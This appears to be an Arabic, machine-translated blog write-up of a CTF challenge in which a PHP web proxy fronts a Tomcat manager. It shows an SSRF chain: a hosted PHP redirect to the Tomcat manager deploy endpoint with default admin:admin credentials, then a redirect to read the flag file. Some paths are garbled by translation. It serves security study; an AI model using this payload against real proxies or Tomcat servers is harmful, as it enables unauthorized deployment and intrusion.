وصف تحدي CTF:

يحتوي التحدي على وكيل ويب php وخادم Tomcat الذي تم نشر تطبيق Tomcat manager فيه ولا يمكن الوصول إليه إلا عبر وكيل الويب php.

https://github.com/Athlon1600/php-proxy-app هو ما يجري في php-proxyتحتوي الحاوية على بعض المشكلات المفتوحة، بما في ذلك بعض المشكلات التي تبدو كذلك استطاع أن تكون ذات صلة بالأمن.

حل

لزيارة حاوية Tomcat من الوكيل، ما عليك سوى الدخول 127.0.0.1:8888 لعرض صفحة ويب Tomcat. يذكر Tomcat أن واجهة الإدارة يجب أن تكون على /مدير/html ولكن عند الزيارة 127.0.0.1:8888/مدير/أتش تي أم أل من خلال الوكيل نحصل على خطأ "401 غير مصرح به".

نجد أيضًا اسم المستخدم وكلمة المرور (مدير-web.xml) وذلك /مدير/نص موجود كواجهة للبرامج النصية.

يمكننا ان نستخدم /مدير/نص/نشر لنشر المجلد الذي يحتوي على العلامة وزيارته مثل أي صفحة ويب أخرى.

ملاحظات دراسة الأمن السيبراني

ملاحظات دراسة OSCP

ثم يمكننا استضافة هذا على جهاز المهاجم المحلي لدينا. يمكن أن يكون عنوان الخادم:

http://127.0.0.1:8000/test

<?PHP
Header('location: http://admin:admin@127.0.0.1:8888/manager/text/deploy?path=/foofour&war=file:/c9fdb1da2a41a453ae291a1fb5d2519701bc60f6');
?>
  1. إعادة توجيه الوكيل إلى  http://127.0.0.1:8000/test
  2. ثم قم بإعادة توجيهه إلى http://127.0.0.1:8888/foofour/flag.txt
  3. علَم: INS{SSRF-As-A-Service}

قائمة التشغيل الخاصة بـ CTF

,
عرض التعليقات

معتصم

عن المؤلف

أقوم بإنشاء ملاحظات حول الأمن السيبراني وملاحظات التسويق الرقمي والدورات التدريبية عبر الإنترنت. أقدم أيضًا استشارات التسويق الرقمي بما في ذلك، على سبيل المثال لا الحصر، تحسين محركات البحث وإعلانات Google وMeta وإدارة CRM.

عرض المقالات